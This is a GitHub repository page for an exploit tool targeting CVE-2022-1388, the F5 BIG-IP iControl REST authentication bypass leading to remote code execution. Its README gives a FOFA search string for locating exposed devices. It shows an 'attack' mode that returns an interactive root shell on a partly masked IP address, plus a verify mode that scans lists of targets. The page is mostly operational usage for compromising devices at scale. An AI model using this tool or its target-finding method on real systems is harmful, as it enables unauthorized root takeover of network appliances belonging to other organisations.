Skip to content

saucer-man/CVE-2022-1388

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
README.md
README.md
 
 
cve-2022-1388.py
cve-2022-1388.py
 
 

Repository files navigation

CVE-2022-1388

F5 BIG-IP Unauthenticated RCE Vulnerability

F5 BIG-IP iControl REST身份验证绕过RCE漏洞

fofa keywords: title="BIG-IP®- Redirect"

usage

  • attack
$ python3 cve-2022-1388.py -t https://203.xxx.xxx.xxx
[+] https://203.xxx.xxx.xxx is vulnerable
[input your command]: id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
[input your command]: whoami
root
[input your command]:
  • verify:
$ python3 cve-2022-1388.py -t https://203.xxx.xxx.xxx --verify
[+] https://203.xxx.xxx.xxx is vulnerable

$ python3 cve-2022-1388.py -f url.txt                                               
[+] https://203.xxx.xxx.xxx is vulnerable

refer

About

CVE-2022-1388

Resources

Readme
Activity

Stars

2 stars

Watchers

1 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published

Languages